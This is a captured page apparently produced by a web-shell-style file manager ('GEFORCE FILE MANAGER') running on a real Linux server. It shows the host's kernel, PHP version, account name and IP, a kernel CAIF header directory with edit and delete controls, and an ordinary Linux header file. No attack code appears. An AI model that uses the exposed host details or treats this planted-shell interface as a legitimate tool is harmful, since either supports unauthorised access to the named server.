[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.63.1.el8_10.x86_64
/
include
/
net
/
caif
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 caif_dev.h
4,441 B
SET
[ EDIT ]
|
[ DEL ]
📄 caif_device.h
1,878 B
SET
[ EDIT ]
|
[ DEL ]
📄 caif_hsi.h
5,282 B
SET
[ EDIT ]
|
[ DEL ]
📄 caif_layer.h
8,921 B
SET
[ EDIT ]
|
[ DEL ]
📄 caif_spi.h
4,200 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfcnfg.h
2,535 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfctrl.h
3,510 B
SET
[ EDIT ]
|
[ DEL ]
📄 cffrml.h
626 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfmuxl.h
594 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfpkt.h
6,477 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfserl.h
269 B
SET
[ EDIT ]
|
[ DEL ]
📄 cfsrvl.h
1,810 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: cfmuxl.h
/* * Copyright (C) ST-Ericsson AB 2010 * Author: Sjur Brendeland * License terms: GNU General Public License (GPL) version 2 */ #ifndef CFMUXL_H_ #define CFMUXL_H_ #include <net/caif/caif_layer.h> struct cfsrvl; struct cffrml; struct cflayer *cfmuxl_create(void); int cfmuxl_set_uplayer(struct cflayer *layr, struct cflayer *up, u8 linkid); struct cflayer *cfmuxl_remove_dnlayer(struct cflayer *layr, u8 phyid); int cfmuxl_set_dnlayer(struct cflayer *layr, struct cflayer *up, u8 phyid); struct cflayer *cfmuxl_remove_uplayer(struct cflayer *layr, u8 linkid); #endif /* CFMUXL_H_ */